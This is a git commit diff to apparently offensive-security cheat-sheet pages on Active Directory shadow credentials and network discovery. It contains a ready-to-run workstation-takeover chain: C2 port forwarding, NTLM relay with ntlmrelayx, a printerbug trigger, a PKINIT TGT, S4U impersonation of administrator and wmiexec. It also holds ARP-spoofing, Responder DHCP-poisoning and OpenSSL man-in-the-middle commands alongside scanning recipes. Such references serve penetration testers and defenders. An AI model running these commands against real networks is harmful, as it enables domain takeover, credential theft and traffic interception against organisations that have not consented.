Shadows Credential + Network Enumeration

engineerali2009 · Mar 5, 2024 · 7257e15 · 7257e15
1 parent b71698c
commit 7257e15
Show file tree

Hide file tree

Showing 2 changed files with 149 additions and 72 deletions.
diff --git a/docs/active-directory/pwd-shadow-credentials.md b/docs/active-directory/pwd-shadow-credentials.md
@@ -39,38 +39,36 @@
   python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "remove" --device-id "a8ce856e-9b58-61f9-8fd3-b079689eb46e"
   ```
 
-**Scenario**:
+## Scenario
 
-- **Scenario 1**: Shadow Credential relaying
-  - Trigger an NTLM authentication from `DC01` (PetitPotam)
-  - Relay it to `DC02` (ntlmrelayx)
-  - Edit `DC01`'s attribute to create a Kerberos PKINIT pre-authentication backdoor (pywhisker)
-  - Alternatively : `ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'`
+### Shadow Credential Relaying
+
+- Trigger an NTLM authentication from `DC01` (PetitPotam)
+- Relay it to `DC02` (ntlmrelayx)
+- Edit `DC01`'s attribute to create a Kerberos PKINIT pre-authentication backdoor (pywhisker)
+- Alternatively : `ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'`
 
-- **Scenario 2**: Workstation Takeover with RBCD
-  ```ps1
-  # Only for C2: Add Reverse Port Forward from 8081 to Team Server 81
 
-  # Set up ntlmrelayx to relay authentication from target workstation to DC 
-  proxychains python3 ntlmrelayx.py -t ldaps://dc1.ez.lab --shadow-credentials --shadow-target ws2\$ --http-port 81
+### Workstation Takeover with RBCD
 
-  # Execute printer bug to trigger authentication from target workstation 
-  proxychains python3 printerbug.py ez.lab/matt:Password1\[email protected] ws1@8081/file
+**Requirements**:
 
-  # Get a TGT using the newly acquired certificate via PKINIT 
-  proxychains python3 gettgtpkinit.py ez.lab/ws2\$ ws2.ccache -cert-pfx /opt/impacket/examples/T12uyM5x.pfx -pfx-pass 5j6fNfnsU7BkTWQOJhpR
+* `Print Spooler` service running
+* `WebClient service` running
 
-  # Get a ST (service ticket) for the target account 
-  proxychains python3 gets4uticket.py kerberos+ccache://ez.lab\\ws2\$:[email protected] cifs/[email protected] [email protected] administrator_tgs.ccache -v
+**Exploitation**:
 
-  # Utilize the ST for future activity 
-  export KRB5CCNAME=/opt/pkinittools/administrator_ws2.ccache
-  proxychains python3 wmiexec.py -k -no-pass ez.lab/[email protected]
-  ```
+* Using your C2, start a reverse socks on port 1080: `socks 1080`
+* Enable port forward from port 8081 to 81 on the compromised machine: `rportfwd 8081 127.0.0.1 81`
+* Start the relay: `proxychains python3 ntlmrelayx.py -t ldaps://dc.domain.lab --shadow-credentials --shadow-target target\$ --http-port 81`
+* Trigger a callback on webdav: `proxychains python3 printerbug.py domain.lab/user:[email protected] compromised@8081/file`
+* Use [PKINIT](https://github.com/dirkjanm/PKINITtools) to get a TGT for the machine account: `proxychains python3 gettgtpkinit.py domain.lab/target\$ target.ccache -cert-pfx </path/from/previous/command.pfx> -pfx-pass <pfx-pass>`
+* Elevate your privileges by creating a service ticket impersonating a local admin: `proxychains python3 gets4uticket.py kerberos+ccache://domain.lab\\target\$:[email protected] cifs/[email protected] [email protected] administrator_target.ccache -v`
+* Use your ticket: `export KRB5CCNAME=/path/to/administrator_target.ccache; proxychains python3 wmiexec.py -k -no-pass domain.lab/[email protected]`
 
 
 ## References
 
-* [Shadow Credentials: Workstation Takeover Edition - Matthew Creel](https://www.fortalicesolutions.com/posts/shadow-credentials-workstation-takeover-edition)
+* [Shadow Credentials: Workstation Takeover Edition - Matthew Creel - October 21, 2021](https://www.fortalicesolutions.com/posts/shadow-credentials-workstation-takeover-edition)
 * [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials)
 * [Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover - Elad Shamir - Jun 17](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab)
diff --git a/docs/cheatsheets/network-discovery.md b/docs/cheatsheets/network-discovery.md
@@ -1,28 +1,110 @@
 # Network Discovery
 
-## Summary
+## DHCP
+
+DHCP (Dynamic Host Configuration Protocol) is a networking protocol used to automatically assign IP addresses and other network configuration parameters to devices on a network. DHCP allows devices to obtain necessary network configuration information from a DHCP server, rather than having to be manually configured.
+
+```ps1
+sudo nmap --script broadcast-dhcp-discover
+Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-04 11:15 CET
+Pre-scan script results:
+| broadcast-dhcp-discover: 
+|   Response 1 of 1: 
+|     Interface: eth0
+|     IP Offered: 192.168.1.111
+|     DHCP Message Type: DHCPOFFER
+|     Server Identifier: 192.168.1.254
+|     IP Address Lease Time: 1d00h00m00s
+|     Renewal Time Value: 12h00m00s
+|     Rebinding Time Value: 21h00m00s
+|     Broadcast Address: 192.168.1.255
+|     Hostname: Host-005
+|     Domain Name Server: 192.168.1.254
+|     Domain Name: lan
+|     Router: 192.168.1.254
+|_    Subnet Mask: 255.255.255.0
+```
 
-- [Nmap](#nmap)
-- [Network Scan with nc and ping](#network-scan-with-nc-and-ping)
-- [Spyse](#spyse)
-- [Masscan](#masscan)
-- [Netdiscover](#netdiscover)
-- [Responder](#responder)
-- [Bettercap](#bettercap)
-- [Reconnoitre](#reconnoitre)
-- [SSL MITM with OpenSSL](#ssl-mitm-with-openssl)
-- [References](#references)
 
-## Nmap
+## DNS
 
-* Ping sweep (No port scan, No DNS resolution)
+* AD DNS
+    * LDAP: `nslookup -type=srv _ldap._tcp.dc._msdcs.<domain name>`
+    * KDC: `nslookup -type=srv _kerberos._tcp.<domain name>`
+    * Global catalog: `nslookup -type=srv _ldap._tcp.<domain name>`
 
-```powershell
-nmap -sn -n --disable-arp-ping 192.168.1.1-254 | grep -v "host down"
--sn : Disable port scanning. Host discovery only.
--n : Never do DNS resolution
+
+## NBT-NS
+
+NS (Name Service) is a component of NBT that provides name resolution services for NETBIOS names. In the context of NBT, NS is responsible for mapping NETBIOS names to IP addresses. 
+
+NBT NS uses a distributed database to store NETBIOS name-to-IP address mappings. Each computer on the network is responsible for registering its own name and IP address in the database, and for resolving names to IP addresses when necessary. When a computer needs to resolve a NETBIOS name to an IP address, it sends a query to the NBT NS service on another computer on the network. The NBT NS service responds with the IP address associated with the requested name, if it is known. It works on `UDP, Port 137`.
+
+* Get names:  `nbtscan -r 192.168.1.0/24`
+* Get the name for a single IP: `nmblookup -A <IP>`
+
+
+## MDNS
+
+MDNS (Multicast Domain Name System) is a protocol used for zero-configuration networking, also known as "zeroconf". It allows devices on a local network to automatically discover each other and resolve hostnames to IP addresses without the need for a centralized DNS server.
+
+MDNS works by using multicast addresses to send DNS queries and responses. When a device wants to resolve a hostname to an IP address, it sends a multicast DNS query to a special multicast address (224.0.0.251 for IPv4 and ff02::fb for IPv6). Any device on the network that is listening for multicast DNS queries and has a matching hostname will respond with its IP address.
+
+```
+mdns-scan
 ```
 
+
+## ARP
+
+ARP (Address Resolution Protocol) is a networking protocol used to map IP addresses to MAC (Media Access Control) addresses on a local area network (LAN). 
+
+* ARP scan
+    ```ps1
+    root@kali:~# arp-scan -l
+    Interface: eth0, datalink type: EN10MB (Ethernet)
+    Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
+    172.16.193.1 00:50:56:c0:00:08 VMware, Inc.
+    172.16.193.2 00:50:56:f1:18:a8 VMware, Inc.
+    172.16.193.254 00:50:56:e5:7b:87 VMware, Inc.
+    ```
+
+* ARP spoof with `arpspoof`
+    ```ps1
+    arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
+    arpspoof -i wlan0 -t 10.0.0.X 10.0.0.Y
+    ```
+
+* ARP spoof with `Bettercap`
+    ```ps1
+    sudo bettercap -iface wlan0
+    net.probe on
+    set arp.spoof.targets <target_IP>
+    arp.spoof on
+    net.sniff on
+    ```
+
+
+## Ping
+
+* Ping sweep with `nmap`: no port scan, no DNS resolution
+
+    ```powershell
+    nmap -sn -n --disable-arp-ping 192.168.1.1-254 | grep -v "host down"
+    -sn : Disable port scanning. Host discovery only.
+    -n : Never do DNS resolution
+    ```
+
+
+## LDAP
+
+* Null bind connection: `ldapsearch -x -h <ip> -s base`
+
+
+## Port Scans and Enumeration
+
+### Nmap
+
 * Basic NMAP
 
 ```bash
@@ -100,22 +182,30 @@ Host script results:
 List Nmap scripts : ls /usr/share/nmap/scripts/
 ```
 
-## Network Scan with nc and ping
+### Network Scan with nc and ping
 
 Sometimes we want to perform network scan without any tools like nmap. So we can use the commands `ping` and `nc` to check if a host is up and which port is open.
+
 To check if hosts are up on a /24 range
+
 ```bash
 for i in `seq 1 255`; do ping -c 1 -w 1 192.168.1.$i > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "192.168.1.$i is UP"; fi ; done
 ```
+
 To check which ports are open on a specific host
+
 ```bash
 for i in {21,22,80,139,443,445,3306,3389,8080,8443}; do nc -z -w 1 192.168.1.18 $i > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "192.168.1.18 has port $i open"; fi ; done
 ```
+
 Both at the same time on a /24 range
+
 ```bash
 for i in `seq 1 255`; do ping -c 1 -w 1 192.168.1.$i > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "192.168.1.$i is UP:"; for j in {21,22,80,139,443,445,3306,3389,8080,8443}; do nc -z -w 1 192.168.1.$i $j > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "\t192.168.1.$i has port $j open"; fi ; done ; fi ; done
 ```
+
 Not in one-liner version:
+
 ```bash
 for i in `seq 1 255`; 
 do 
@@ -136,34 +226,7 @@ done
 ```
 
 
-## Spyse
-* Spyse API - for detailed info is better to check [Spyse](https://spyse.com/)
-
-* [Spyse Wrapper](https://github.com/zeropwn/spyse.py)
-
-#### Searching for subdomains
-```bash
-spyse -target xbox.com --subdomains
-```
-
-#### Reverse IP Lookup
-```bash
-spyse -target 52.14.144.171 --domains-on-ip
-```
-
-#### Searching for SSL certificates
-```bash
-spyse -target hotmail.com --ssl-certificates
-```
-```bash
-spyse -target "org: Microsoft" --ssl-certificates
-```
-#### Getting all DNS records
-```bash
-spyse -target xbox.com --dns-all
-```
-
-## Masscan
+### Masscan
 
 ```powershell
 masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
@@ -186,7 +249,7 @@ UDP_PORTS=$(cat $MACHINE_IP/scans/masscan-ports.lst| grep open | grep udp | cut
 [ "$UDP_PORTS" ] && sudo nmap -sU -sC -sV -v -Pn -n -T4 -p$UDP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_udp $MACHINE_IP
 ```
 
-## Reconnoitre
+### Reconnoitre
 
 Dependencies:
 
@@ -225,7 +288,14 @@ responder.py -I eth0 -wrf
 
 Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows)
 
-## Bettercap
+## MITM
+
+* WSUS poisoning
+* ARP poisoning
+* DHCP poisoning: `responder --interface "eth0" --DHCP --wpad`
+
+
+### Bettercap
 
 ```powershell
 bettercap -X --proxy --proxy-https -T <target IP>
@@ -234,23 +304,32 @@ bettercap -X --proxy --proxy-https -T <target IP>
 # targetting specific IP only
 ```
 
-## SSL MITM with OpenSSL
+
+### SSL MITM with OpenSSL
+
 This code snippet allows you to sniff/modify SSL traffic if there is a MITM vulnerability using only openssl.
 If you can modify `/etc/hosts` of the client:
+
 ```powershell
 sudo echo "[OPENSSL SERVER ADDRESS] [domain.of.server.to.mitm]" >> /etc/hosts  # On client host
 ```
+
 On our MITM server, if the client accepts self signed certificates (you can use a legit certificate if you have the private key of the legit server):
+
 ```powershell
 openssl req -subj '/CN=[domain.of.server.to.mitm]' -batch -new -x509 -days 365 -nodes -out server.pem -keyout server.pem
 ```
+
 On our MITM server, we setup our infra:
+
 ```powershell
 mkfifo response
 sudo openssl s_server -cert server.pem -accept [INTERFACE TO LISTEN TO]:[PORT] -quiet < response | tee | openssl s_client -quiet -servername [domain.of.server.to.mitm] -connect[IP of server to MITM]:[PORT] | tee | cat > response
 ```
+
 In this example, traffic is only displayed with `tee` but we could modify it using `sed` for example.
 
+
 ## References
 
-* [TODO](TODO)
+* [Pwning the Domain: Credentialess/Username - hadess - February 7, 2024 ](https://hadess.io/pwning-the-domain-credentialess-username/)